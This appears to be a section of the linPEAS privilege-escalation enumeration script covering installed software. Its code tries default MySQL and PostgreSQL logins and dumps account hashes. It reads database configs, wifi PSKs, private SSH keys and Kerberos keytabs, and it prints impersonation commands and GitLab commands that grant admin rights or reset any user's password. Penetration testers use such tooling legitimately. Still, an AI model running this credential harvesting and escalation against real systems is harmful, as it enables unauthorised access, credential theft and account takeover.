###########################################
#--------) Software Information (---------#
###########################################


#-- SI) Mysql version
# Print the MySQL client version, or the shared "not found" line when the
# client is not installed. Helpers print_2title / echo_not_found are defined
# elsewhere in the script.
print_2title "MySQL version"
if ! mysql --version 2>/dev/null; then
  echo_not_found "mysql"
fi
echo ""

#-- SI) Mysql connection root/root
# Probe the local MySQL server with a few well-known default credentials.
# A non-empty `mysqladmin version` reply means the login worked; the account
# table is then printed, highlighted in red. Helpers: print_list, echo_no;
# colour variables: E, SED_RED.
print_list "MySQL connection using default root/root ........... "
mysqlconnect=$(mysqladmin -uroot -proot version 2>/dev/null)
if [ -n "$mysqlconnect" ]; then
  printf '%s\n' "Yes" | sed -${E} "s,.*,${SED_RED},"
  mysql -u root --password=root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
else
  echo_no
fi

#-- SI) Mysql connection root/toor
print_list "MySQL connection using root/toor ................... "
mysqlconnect=$(mysqladmin -uroot -ptoor version 2>/dev/null)
if [ -n "$mysqlconnect" ]; then
  printf '%s\n' "Yes" | sed -${E} "s,.*,${SED_RED},"
  mysql -u root --password=toor -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
else
  echo_no
fi

#-- SI) Mysql connection root/NOPASS
# The probe runs before the label is printed; it writes nothing to stdout.
mysqlconnectnopass=$(mysqladmin -uroot version 2>/dev/null)
print_list "MySQL connection using root/NOPASS ................. "
if [ -n "$mysqlconnectnopass" ]; then
  printf '%s\n' "Yes" | sed -${E} "s,.*,${SED_RED},"
  mysql -u root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
else
  echo_no
fi

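#-- SI) Mysql credentials
# Walk every directory listed (one per line) in PSTORAGE_MYSQL looking for
# readable credential material: debian.cnf, user.MYD (raw account table),
# any config containing a "user =" line, and my.cnf. Afterwards report
# whether the lib_mysqludf_sys library is present on the host.
# Helpers: print_2title, echo_not_found; colours: E, SED_*; user-name
# patterns: sh_usrs, nosh_usrs, knw_usrs.
print_2title "Searching mysql credentials and exec"
if [ "$PSTORAGE_MYSQL" ]; then
  printf "%s\n" "$PSTORAGE_MYSQL" | while IFS= read -r d; do
    # An empty entry used to make `find` scan the current directory.
    [ -n "$d" ] || continue
    # find | read (instead of `for f in $(find ...)`) keeps paths with spaces intact.
    find "$d" -name debian.cnf 2>/dev/null | while IFS= read -r f; do
      if [ -r "$f" ]; then
        echo "We can read the mysql debian.cnf. You can use this username/password to log in MySQL" | sed -${E} "s,.*,${SED_RED},"
        cat "$f"
      fi
    done
    find "$d" -name user.MYD 2>/dev/null | while IFS= read -r f; do
      if [ -r "$f" ]; then
        echo "We can read the Mysql Hashes from $f" | sed -${E} "s,.*,${SED_RED},"
        # a-zA-Z: the former "a-Z" range is invalid in the C locale and made grep fail.
        grep -oaE "[-_\.\*a-zA-Z0-9]{3,}" "$f" | grep -v "mysql_native_password"
      fi
    done
    grep -lr "user\s*=" "$d" 2>/dev/null | grep -v "debian.cnf" | while IFS= read -r f; do
      if [ -r "$f" ]; then
        u=$(grep -v "#" "$f" 2>/dev/null | grep "user" | grep "=")
        echo "From '$f' Mysql user: $u" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
      fi
    done
    find "$d" -name my.cnf 2>/dev/null | while IFS= read -r f; do
      if [ -r "$f" ]; then
        echo "Found readable $f"
        grep -v "^#" "$f" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed "s,password.*,${SED_RED},"
      fi
    done
  done
  # Loop-invariant: hoisted out of the per-directory loop so it is reported once.
  mysqlexec=$(whereis lib_mysqludf_sys.so 2>/dev/null | grep "lib_mysqludf_sys\.so")
  if [ -n "$mysqlexec" ]; then
    echo "Found $mysqlexec"
    echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -${E} "s,.*,${SED_RED},"
  fi
else
  echo_not_found
fi
echo ""
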
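peass{MariaDB}

peass{PostgreSQL}

#-- SI) PostgreSQL brute
# Probe the local PostgreSQL server for password-less access as the usual
# service accounts (postgres, pgsql) against template0 and template1.
# Only runs when TIMEOUT is set: on systems without the timeout command
# (e.g. OpenBSD) psql would prompt for a password on the console and hang
# the script. Helpers: print_list, echo_no; colours: E, SED_RED.
if [ "$TIMEOUT" ]; then
  #checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this
  print_list "PostgreSQL connection to template0 using postgres/NOPASS ........ "
  if [ -n "$(timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null)" ]; then
    echo "Yes" | sed -${E} "s,.*,${SED_RED},"
  else
    echo_no
  fi

  print_list "PostgreSQL connection to template1 using postgres/NOPASS ........ "
  # Same whole-line highlight as the sibling checks; the former "s,.)*," pattern
  # only coloured the first character.
  if [ -n "$(timeout 1 psql -U postgres -d template1 -c 'select version()' 2>/dev/null)" ]; then
    echo "Yes" | sed -${E} "s,.*,${SED_RED},"
  else
    echo_no
  fi

  print_list "PostgreSQL connection to template0 using pgsql/NOPASS ........... "
  if [ -n "$(timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null)" ]; then
    echo "Yes" | sed -${E} "s,.*,${SED_RED},"
  else
    echo_no
  fi

  print_list "PostgreSQL connection to template1 using pgsql/NOPASS ........... "
  if [ -n "$(timeout 1 psql -U pgsql -d template1 -c 'select version()' 2>/dev/null)" ]; then
    echo "Yes" | sed -${E} "s,.*,${SED_RED},"
  else
    echo_no
  fi
  echo ""
fi
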
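peass{Mongo}

peass{Apache}

peass{Tomcat}

peass{FastCGI}

peass{Http_conf}

peass{Htpasswd}

peass{PHP Sessions}

peass{Wordpress}

peass{Drupal}

peass{Moodle}

peass{Supervisord}

peass{Cesi}

peass{Rsync}

peass{Hostapd}

#-- SI) Wifi conns
# List NetworkManager connection profiles and surface any stored "psk=" lines
# (highlighted in red). Helpers: print_2title, echo_not_found; colour: SED_RED.
print_2title "Searching wifi conns file"
wifi=$(find /etc/NetworkManager/system-connections/ -type f 2>/dev/null)
if [ -n "$wifi" ]; then
  # IFS= read -r so profile names containing spaces or backslashes survive intact.
  printf "%s\n" "$wifi" | while IFS= read -r f; do
    printf '%s\n' "$f"
    grep "psk.*=" "$f" 2>/dev/null | sed "s,psk.*,${SED_RED},"
  done
else
  echo_not_found
fi
echo ""
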
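peass{Anaconda ks}

peass{VNC}

peass{Ldap}

peass{OpenVPN}

#-- SI) ssh files
# Gather the inputs for the SSH/SSL checks that follow: candidate certificate
# files containing no quote or parenthesis characters (so unlikely to be
# source code), and whether ssh_config / hosts.denied / hosts.allow exist.
# The variables set here (certsb4_grep, sshconfig, hostsdenied, hostsallow)
# are consumed later in this section.
print_2title "Searching ssl/ssh files"
if [ "$PSTORAGE_CERTSB4" ]; then
  # PSTORAGE_CERTSB4 is expanded unquoted on purpose: it holds a list of files.
  # shellcheck disable=SC2086
  certsb4_grep=$(grep -L "\"\|'\|(" $PSTORAGE_CERTSB4 2>/dev/null)
fi
sshconfig="$(ls /etc/ssh/ssh_config 2>/dev/null)"
hostsdenied="$(ls /etc/hosts.denied 2>/dev/null)"
hostsallow="$(ls /etc/hosts.allow 2>/dev/null)"

peass{SSH}

# Show the security-relevant sshd directives that are in effect (comment
# lines dropped; a directive followed by a trailing comment is kept) and flag
# the permissive ones. "ForwardAgent" was previously misspelt "FordwardAgent"
# in the highlight pattern, so that setting was never coloured.
grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "^[[:space:]]*#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|ForwardAgent.*es,${SED_RED},"
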
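# Look for PEM private keys. With TIMEOUT available each recursive grep is
# capped at 40 s, because a very large tree can otherwise hang the script;
# without it only /etc and $HOME/.ssh are searched and the /root and /mnt
# results are explicitly emptied so the summary below never reads stale
# values. HOMESEARCH is expanded unquoted on purpose (it may hold several
# directories). Helpers: print_3title; colours: E, SED_RED.
if [ "$TIMEOUT" ]; then
  privatekeyfilesetc=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null)
  # shellcheck disable=SC2086
  privatekeyfileshome=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOMESEARCH 2>/dev/null)
  privatekeyfilesroot=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /root 2>/dev/null)
  privatekeyfilesmnt=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /mnt 2>/dev/null)
else
  # If there are tons of files linpeas gets frozen here without a timeout
  privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null)
  privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' "$HOME/.ssh" 2>/dev/null)
  privatekeyfilesroot=""
  privatekeyfilesmnt=""
fi

if [ -n "$privatekeyfilesetc" ] || [ -n "$privatekeyfileshome" ] || [ -n "$privatekeyfilesroot" ] || [ -n "$privatekeyfilesmnt" ]; then
  echo ""
  print_3title "Possible private SSH keys were found!" | sed -${E} "s,private SSH keys,${SED_RED},"
  # '%s' rather than the data as the format string: a '%' in a path no longer breaks printf.
  if [ -n "$privatekeyfilesetc" ]; then printf '%s\n' "$privatekeyfilesetc" | sed -${E} "s,.*,${SED_RED},"; fi
  if [ -n "$privatekeyfileshome" ]; then printf '%s\n' "$privatekeyfileshome" | sed -${E} "s,.*,${SED_RED},"; fi
  if [ -n "$privatekeyfilesroot" ]; then printf '%s\n' "$privatekeyfilesroot" | sed -${E} "s,.*,${SED_RED},"; fi
  if [ -n "$privatekeyfilesmnt" ]; then printf '%s\n' "$privatekeyfilesmnt" | sed -${E} "s,.*,${SED_RED},"; fi
  echo ""
fi
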
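# Report certificates, SSH agent material, per-user ssh configs and the TCP
# wrapper rules, using the variables set at the top of this section
# (certsb4_grep, hostsdenied, hostsallow, sshconfig) plus the PSTORAGE_*
# lists. Helpers: print_3title; colours: E, SED_RED, SED_GREEN.
if [ -n "$certsb4_grep" ] || [ -n "$PSTORAGE_CERTSBIN" ]; then
  print_3title "Some certificates were found (out limited):"
  if [ -n "$certsb4_grep" ]; then printf '%s\n' "$certsb4_grep" | head -n 20; fi
  # Was "$$PSTORAGE_CERTSBIN": $$ is the shell PID, so this list was never printed.
  if [ -n "$PSTORAGE_CERTSBIN" ]; then printf '%s\n' "$PSTORAGE_CERTSBIN" | head -n 20; fi
  echo ""
fi
if [ -n "$PSTORAGE_CERTSCLIENT" ]; then
  print_3title "Some client certificates were found:"
  printf '%s\n' "$PSTORAGE_CERTSCLIENT"
  echo ""
fi
if [ -n "$PSTORAGE_SSH_AGENTS" ]; then
  print_3title "Some SSH Agent files were found:"
  printf '%s\n' "$PSTORAGE_SSH_AGENTS"
  echo ""
fi
# grep -qv: true when the agent answered with anything other than "no identities".
if ssh-add -l 2>/dev/null | grep -qv 'no identities'; then
  print_3title "Listing SSH Agents"
  ssh-add -l
  echo ""
fi
if [ -n "$PSTORAGE_SSH_CONFIG" ]; then
  print_3title "Some home ssh config file was found"
  printf "%s\n" "$PSTORAGE_SSH_CONFIG" | while IFS= read -r f; do
    # NOTE(review): $f is interpolated into the sed pattern unescaped; a path
    # containing ',' or regex metacharacters would only mis-colour the line.
    ls "$f" | sed -${E} "s,$f,${SED_RED},"
    grep -Iv "^$" "$f" 2>/dev/null | grep -v "^#" | sed -${E} "s,User|ProxyCommand,${SED_RED},"
  done
  echo ""
fi
if [ -n "$hostsdenied" ]; then
  print_3title "/etc/hosts.denied file found, read the rules:"
  printf '%s\n' "$hostsdenied"
  grep -v "#" /etc/hosts.denied 2>/dev/null | grep -Iv "^$" | sed -${E} "s,.*,${SED_GREEN},"
  echo ""
fi
if [ -n "$hostsallow" ]; then
  print_3title "/etc/hosts.allow file found, trying to read the rules:"
  printf '%s\n' "$hostsallow"
  grep -v "#" /etc/hosts.allow 2>/dev/null | grep -Iv "^$" | sed -${E} "s,.*,${SED_RED},"
  echo ""
fi
if [ -n "$sshconfig" ]; then
  echo ""
  echo "Searching inside /etc/ssh/ssh_config for interesting info"
  grep -v "^#" /etc/ssh/ssh_config 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${SED_RED},"
fi
echo ""
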
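#-- SI) PAM auth
# Show the "auth" lines of /etc/pam.d/sshd that are neither comments nor
# "@include" lines. The grep result is reused for printing instead of running
# the same pipeline a second time. Helpers: print_2title, echo_no.
print_2title "Searching unexpected auth lines in /etc/pam.d/sshd"
pamssh=$(grep -v "^#\|^@" /etc/pam.d/sshd 2>/dev/null | grep -i auth)
if [ -n "$pamssh" ]; then
  printf '%s\n' "$pamssh" | sed -${E} "s,.*,${SED_RED},"
else
  echo_no
fi
echo ""
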
#-- SI) NFS exports
# Print the active lines of /etc/exports, highlighting no_root_squash /
# no_all_squash and "insecure". Helpers: print_2title, print_info,
# echo_not_found; colours: E, SED_RED_YELLOW, SED_RED.
print_2title "NFS exports?"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe"
if [ -n "$(cat /etc/exports 2>/dev/null)" ]; then
  grep -v "^#" /etc/exports 2>/dev/null \
    | grep -Ev "\W+\#|^#" 2>/dev/null \
    | sed -${E} "s,no_root_squash|no_all_squash ,${SED_RED_YELLOW}," \
    | sed -${E} "s,insecure,${SED_RED},"
else
  echo_not_found "/etc/exports"
fi
echo ""

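#-- SI) Kerberos
# Kerberos/AD footprint: admin tools present, whether ptrace is restricted
# (relevant to reading tickets out of process memory), then each file listed
# in PSTORAGE_KERBEROS is classified by name (.k5login, keytab, krb5.conf,
# kadm5.acl, sssd.conf, secrets.ldb, .secrets.mkey) and summarised. Finally
# the usual credential-cache locations and `klist` output are shown.
# Helpers: print_2title, print_info, echo_not_found; colours: E, SED_*,
# ITALIC, NC.
print_2title "Searching kerberos conf files and tickets"
print_info "http://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-active-directory"
kadmin_exists="$(command -v kadmin)"
klist_exists="$(command -v klist)"
if [ -n "$kadmin_exists" ]; then
  echo "kadmin was found on $kadmin_exists" | sed "s,$kadmin_exists,${SED_RED},"
fi
if [ -n "$klist_exists" ] && [ -x "$klist_exists" ]; then
  echo "klist execution"
  klist
fi
ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)"
if [ -n "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then
  echo "ptrace protection is disabled (0), you might find tickets inside processes memory" | sed "s,is disabled,${SED_RED},g"
else
  echo "ptrace protection is enabled ($ptrace_scope), you need to disable it to search for tickets inside processes memory" | sed "s,is enabled,${SED_GREEN},g"
fi

printf "%s\n" "$PSTORAGE_KERBEROS" | while IFS= read -r f; do
  [ -r "$f" ] || continue
  # case replaces the former `echo "$f" | grep -q NAME` chain; first match wins, same order.
  case "$f" in
    *k5login*)
      echo ".k5login file (users with access to the user who has this file in his home)"
      sed -${E} "s,.*,${SED_RED},g" "$f" 2>/dev/null
      ;;
    *keytab*)
      echo ""
      echo "keytab file found, you may be able to impersonate some kerberos principals and add users or modify passwords"
      klist -k "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g"
      # klist output is piped straight to awk; it was previously used as a printf format string.
      klist -k "$f" 2>/dev/null | awk '{print $2}' | while IFS= read -r l; do
        if [ -n "$l" ] && echo "$l" | grep -q "@"; then
          printf '%s\n' "$ITALIC --- Impersonation command: ${NC}kadmin -k -t /etc/krb5.keytab -p \"$l\"" | sed -${E} "s,$l,${SED_RED},g"
          #kadmin -k -t /etc/krb5.keytab -p "$l" -q getprivs 2>/dev/null #This should show the permissions of each impersoanted user, the thing is that in a test it showed that every user had the same permissions (even if they didn't). So this test isn't valid
          #We could also try to create a new user or modify a password, but I'm not user if linpeas should do that
        fi
      done
      ;;
    *krb5.conf*)
      ls -l "$f"
      sed -${E} "s,default_ccache_name,${SED_RED}," "$f" 2>/dev/null
      ;;
    *kadm5.acl*)
      ls -l "$f"
      cat "$f" 2>/dev/null
      ;;
    *sssd.conf*)
      ls -l "$f"
      sed -${E} "s,cache_credentials ?= ?[tT][rR][uU][eE],${SED_RED}," "$f" 2>/dev/null
      ;;
    *secrets.ldb*)
      echo "You could use SSSDKCMExtractor to extract the tickets stored here" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},"
      ls -l "$f"
      ;;
    *secrets.mkey*)
      echo "This is the secrets file to use with SSSDKCMExtractor" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},"
      ls -l "$f"
      ;;
  esac
done
# Globs stay unquoted so they expand; the former quoted "krb5cc*" looked for a
# literal file of that name and never matched.
krb_tickets_found=""
for krb_candidate in /tmp/krb5cc* /var/lib/sss/db/ccache_* /etc/opt/quest/vas/host.keytab; do
  if [ -e "$krb_candidate" ]; then
    ls -ld "$krb_candidate" 2>/dev/null && krb_tickets_found=1
  fi
done
[ -n "$krb_tickets_found" ] || echo_not_found "tickets kerberos"
klist 2>/dev/null || echo_not_found "klist"
echo ""
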
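peass{Knockd}

peass{Kibana}

peass{Elasticsearch}

##-- SI) Logstash
# For each Logstash directory in PSTORAGE_LOGSTASH: show the service user
# from startup.options and highlight pipeline settings that run commands or
# code (exec/command in outputs, path/code/ruby in filters).
# Helpers: print_2title, echo_not_found; colours: E, SED_*; user-name
# patterns: sh_usrs, nosh_usrs, knw_usrs.
print_2title "Searching logstash files"
if [ -n "$PSTORAGE_LOGSTASH" ]; then
  printf '%s\n' "$PSTORAGE_LOGSTASH"
  printf "%s\n" "$PSTORAGE_LOGSTASH" | while IFS= read -r d; do
    if [ -r "$d/startup.options" ]; then
      echo "Logstash is running as user:"
      grep "LS_USER\|LS_GROUP" "$d/startup.options" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed -${E} "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,root,${SED_RED},"
    fi
    # Globs must sit outside the quotes to expand; the former "$d/conf.d/out*"
    # was a literal file name. Missing-file errors are silenced.
    cat "$d"/conf.d/out* 2>/dev/null | grep "exec\s*{\|command\s*=>" | sed -${E} "s,exec\W*\{|command\W*=>,${SED_RED},"
    cat "$d"/conf.d/filt* 2>/dev/null | grep "path\s*=>\|code\s*=>\|ruby\s*{" | sed -${E} "s,path\W*=>|code\W*=>|ruby\W*\{,${SED_RED},"
  done
else
  echo_not_found
fi
echo ""
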
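#-- SI) Vault-ssh
# Show each vault-ssh-helper config in PSTORAGE_VAULT_SSH_HELPER and run the
# helper's verify-only check on it, then list Vault secret engines and
# highlight the token files in PSTORAGE_VAULT_SSH_TOKEN.
# Helpers: print_2title, echo_not_found; colours: E, SED_RED.
print_2title "Searching Vault-ssh files"
if [ -n "$PSTORAGE_VAULT_SSH_HELPER" ]; then
  # '%s' so a '%' in a path is not read as a printf directive.
  printf '%s\n' "$PSTORAGE_VAULT_SSH_HELPER"
  printf "%s\n" "$PSTORAGE_VAULT_SSH_HELPER" | while IFS= read -r f; do
    cat "$f" 2>/dev/null
    vault-ssh-helper -verify-only -config "$f" 2>/dev/null
  done
  echo ""
  vault secrets list 2>/dev/null
  printf "%s\n" "$PSTORAGE_VAULT_SSH_TOKEN" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null
else
  echo_not_found "vault-ssh-helper.hcl"
fi
echo ""
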
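#-- SI) Cached AD Hashes
# Report well-known on-disk credential caches (Samba secrets/passdb, VAS
# auth cache, SSSD cache files). The SSSD glob stays unquoted so it expands;
# the former quoted "cache_*" was a literal file name and never matched.
# adhashes collects the paths that exist. Helpers: print_2title, echo_not_found.
print_2title "Searching AD cached hashes"
adhashes=""
for adhash_candidate in /var/lib/samba/private/secrets.tdb /var/lib/samba/passdb.tdb /var/opt/quest/vas/authcache/vas_auth.vdb /var/lib/sss/db/cache_*; do
  if [ -e "$adhash_candidate" ]; then
    ls -l "$adhash_candidate" 2>/dev/null && adhashes="${adhashes}${adhash_candidate} "
  fi
done
if [ -z "$adhashes" ]; then
  echo_not_found "cached hashes"
fi
echo ""
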
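#-- SI) Screen sessions
# Show `screen -ls` output in red, with the "No Sockets found" line in green.
# Helpers: print_2title, print_info, echo_not_found; colours: E, SED_RED, C.
print_2title "Searching screen sessions"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions"
screensess=$(screen -ls 2>/dev/null)
if [ -n "$screensess" ]; then
  # '%s' keeps a '%' in a session name from being read as a printf directive;
  # no trailing newline, the same as the former output before the closing echo.
  printf '%s' "$screensess" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,No Sockets found.*,${C}[32m&${C}[0m,"
else
  echo_not_found "screen"
fi
echo ""
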
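#-- SI) Tmux sessions
# Show `tmux ls` output plus any running "tmux " processes from ps
# (presumably to catch servers on non-default sockets), in red, with the
# "no server running" line in green. Helpers: print_2title, print_info,
# echo_not_found; colours: E, SED_RED, C.
tmuxdefsess=$(tmux ls 2>/dev/null)
tmuxnondefsess=$(ps auxwww | grep "tmux " | grep -v grep)
print_2title "Searching tmux sessions"$N
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions"
if [ -n "$tmuxdefsess" ] || [ -n "$tmuxnondefsess" ]; then
  # '%s' so a '%' in a session name is not read as a printf directive.
  printf '%s\n%s\n' "$tmuxdefsess" "$tmuxnondefsess" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,no server running on.*,${C}[32m&${C}[0m,"
else
  echo_not_found "tmux"
fi
echo ""
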
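peass{CouchDB}

peass{Redis}

#-- SI) Dovecot
# Needs testing
# Report dovecot config lines mentioning PLAIN. `grep -r` output is
# "file:line"; it is iterated line by line (the former `for d in $(grep ...)`
# split every line into words, so any line containing spaces was torn apart
# and reported under the wrong file name).
# Helpers: print_2title, echo_not_found; colours: E, SED_RED.
print_2title "Searching dovecot files"
dovecotpass=$(grep -r "PLAIN" /etc/dovecot 2>/dev/null)
if [ -z "$dovecotpass" ]; then
  echo_not_found "dovecot credentials"
else
  printf '%s\n' "$dovecotpass" | while IFS= read -r d; do
    df=${d%%:*}
    dp=${d#*:}
    echo "Found possible PLAIN text creds in $df"
    echo "$dp" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null
  done
fi
echo ""
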
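peass{Mosquitto}

peass{Neo4j}

peass{Cloud Credentials}

peass{Cloud Init}

peass{CloudFlare}

peass{Erlang}

peass{GMV Auth}

peass{IPSec}

peass{IRSSI}

peass{Keyring}

peass{Filezilla}

peass{Backup Manager}

##-- SI) passwd files (splunk)
# Report the splunk binary and print credential-looking lines from the
# non-executable files listed in PSTORAGE_SPLUNK.
# Helpers: print_2title; colours: E, SED_RED.
print_2title "Searching uncommon passwd files (splunk)"
SPLUNK_BIN="$(command -v splunk 2>/dev/null)"
if [ -n "$SPLUNK_BIN" ]; then
  echo "splunk binary was found installed on $SPLUNK_BIN" | sed "s,.*,${SED_RED},"
fi
printf "%s\n" "$PSTORAGE_SPLUNK" | sort -u | while IFS= read -r f; do
  if [ -f "$f" ] && ! [ -x "$f" ]; then
    echo "passwd file: $f" | sed "s,$f,${SED_RED},"
    # -E so '|' is alternation: the former BRE pattern with embedded quote
    # characters was matched literally and selected nothing. [$] is a literal
    # dollar (presumably aimed at hash fields), not an end-of-line anchor.
    grep -E "password|pass|user|database|host|[$]" "$f" 2>/dev/null | sed -${E} "s,password|pass|user|database|host|[$],${SED_RED},"
  fi
done
echo ""
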
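# Print each kcpassword path from PSTORAGE_KCPASSWORD and its base64 content.
# The list is already newline separated; the former extra "\n" inside the %s
# argument became a literal backslash-n on the last path (and a bogus entry
# when the list was empty), so base64 was handed a wrong file name.
# Helpers: print_2title, print_info; colours: E, SED_RED.
print_2title "Analyzing kcpassword files"
print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#kcpassword"
if [ -n "$PSTORAGE_KCPASSWORD" ]; then
  printf "%s\n" "$PSTORAGE_KCPASSWORD" | while IFS= read -r f; do
    echo "$f" | sed -${E} "s,.*,${SED_RED},"
    base64 "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
  done
fi
echo ""
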
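##-- SI) Gitlab
# GitLab: when the gitlab-rails runner is available, dump user records and
# print the existing follow-up hints; when gitlab-backup exists, print its
# hints; then summarise secrets.yml / gitlab.yml / gitlab.rb from
# PSTORAGE_GITLAB. Helpers: print_2title; colours: E, SED_RED.
print_2title "Searching GitLab related files"
#Check gitlab-rails
if [ -n "$(command -v gitlab-rails)" ]; then
  echo "gitlab-rails was found. Trying to dump users..."
  gitlab-rails runner 'User.where.not(username: "peasssssssss").each { |u| pp u.attributes }' | sed -${E} "s,email|password,${SED_RED},"
  echo "If you have enough privileges, you can make an account under your control administrator by running: gitlab-rails runner 'user = User.find_by(email: \"youruser@example.com\"); user.admin = TRUE; user.save!'"
  echo "Alternatively, you could change the password of any user by running: gitlab-rails runner 'user = User.find_by(email: \"admin@example.com\"); user.password = \"pass_peass_pass\"; user.password_confirmation = \"pass_peass_pass\"; user.save!'"
  echo ""
fi
if [ -n "$(command -v gitlab-backup)" ]; then
  echo "If you have enough privileges, you can create a backup of all the repositories inside gitlab using 'gitlab-backup create'"
  echo "Then you can get the plain-text with something like 'git clone \@hashed/19/23/14348274[...]38749234.bundle'"
  echo ""
fi
#Check gitlab files
printf "%s\n" "$PSTORAGE_GITLAB" | sort -u | while IFS= read -r f; do
  # case on the quoted path replaces `echo $f | grep -q`, which word-split and globbed $f.
  case "$f" in
    *secrets.yml*)
      echo "Found $f" | sed "s,$f,${SED_RED},"
      grep -Iv "^$" "$f" 2>/dev/null | grep -v "^#"
      ;;
    *gitlab.yml*)
      echo "Found $f" | sed "s,$f,${SED_RED},"
      grep -A 4 "repositories:" "$f" 2>/dev/null
      ;;
    *gitlab.rb*)
      echo "Found $f" | sed "s,$f,${SED_RED},"
      grep -Iv "^$" "$f" 2>/dev/null | grep -v "^#" | sed -${E} "s,email|user|password,${SED_RED},"
      ;;
  esac
  # One blank line per entry, as before.
  echo ""
done
echo ""
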
peass{Github}

peass{Svn}

peass{PGP-GPG}

peass{Cache Vi}

peass{Wget}

##-- SI) containerd installed
# Report the ctr binary if present and list the images it knows about.
# Helpers: print_2title, print_info; colours: E, SED_RED.
print_2title "Checking if containerd(ctr) is available"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation"
containerd="$(command -v ctr)"
if [ -n "$containerd" ]; then
  echo "ctr was found in $containerd, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED},"
  ctr image list
fi
echo ""

##-- SI) runc installed
# Report the runc binary if present. Helpers: print_2title, print_info;
# colours: E, SED_RED.
print_2title "Checking if runc is available"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation"
runc="$(command -v runc)"
if [ -n "$runc" ]; then
  echo "runc was found in $runc, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED},"
fi
echo ""

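#-- SI) Docker
# List the first 70 docker-related paths from PSTORAGE_DOCKER and flag a
# docker socket that is writable by the current user (skipped when already
# root, per IAMROOT). Helpers: print_2title, print_info; colours: E,
# SED_RED_YELLOW.
print_2title "Searching docker files (limit 70)"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket"
printf "%s\n" "$PSTORAGE_DOCKER" | head -n 70 | while IFS= read -r f; do
  [ -n "$f" ] || continue
  ls -l "$f" 2>/dev/null
  # -S: the path is a socket.
  if ! [ "$IAMROOT" ] && [ -S "$f" ] && [ -w "$f" ]; then
    echo "Docker socket file ($f) is writable" | sed -${E} "s,.*,${SED_RED_YELLOW},"
  fi
done
echo ""
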
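peass{Firefox}

peass{Chrome}

peass{Autologin}

#-- SI) S/Key authentication
# BSD login.conf: report whether S/Key is an accepted auth method and, if so,
# whether /etc/skey/ exists and (for non-root runs) is writable.
# The comment filter is now `grep -v "^#"`; the former `\"^#\"` passed the
# quote characters to grep as part of the pattern, so commented-out auth=
# lines were not filtered. Helpers: print_2title; colours: RED, GREEN, NC;
# IAMROOT set elsewhere.
print_2title "S/Key authentication"
if grep auth= /etc/login.conf 2>/dev/null | grep -v "^#" | grep -q skey; then
  printf '%s\n' "System supports$RED S/Key$NC authentication"
  if ! [ -d /etc/skey/ ]; then
    echo "${GREEN}S/Key authentication enabled, but has not been initialized"
  elif ! [ "$IAMROOT" ] && [ -w /etc/skey/ ]; then
    echo "${RED}/etc/skey/ is writable by you"
    ls -ld /etc/skey/
  else
    ls -ld /etc/skey/ 2>/dev/null
  fi
fi
echo ""
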
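#-- SI) YubiKey authentication
# BSD login.conf: report whether YubiKey is an accepted auth method and
# whether /var/db/yubikey/ is writable by a non-root user. As in the S/Key
# check, `grep -v "^#"` replaces the former `\"^#\"`, which matched nothing
# and so left commented-out auth= lines in. Helpers: print_2title; colours:
# RED, NC; IAMROOT set elsewhere.
print_2title "YubiKey authentication"
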